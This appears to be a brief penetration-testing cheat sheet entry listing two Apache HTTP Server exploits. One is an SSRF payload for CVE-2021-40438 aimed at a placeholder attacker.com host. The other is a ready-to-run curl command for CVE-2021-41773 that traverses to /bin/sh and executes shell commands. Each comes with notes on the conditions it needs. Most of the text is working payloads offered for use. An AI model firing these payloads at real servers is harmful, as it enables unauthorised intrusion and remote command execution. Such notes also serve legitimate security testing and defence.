* Apache <=2.4.48 (CVE-2021-40438)

  `/?unix:{"A"*4096}|http://attacker.com/`

  Null pointer dereference causes SSRF

  - Doesn't seem to work for Python requests module - use curl or burp instead
  - Seems to only work for intranet


* Apache 2.4.49-50 LFI2RCE (CVE-2021-41773)

  `curl 'http://example.com/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh' --data 'echo; ls'`

  `cgi-bin` is a folder that allows execution of external programs (like binaries, Python scripts) from the web
  interface.

  - Needs `mod_cgi` enabled in Apache config (not default)
  - Apache needs path traversal perms granted for `/bin` or `/` (usually not the case!)
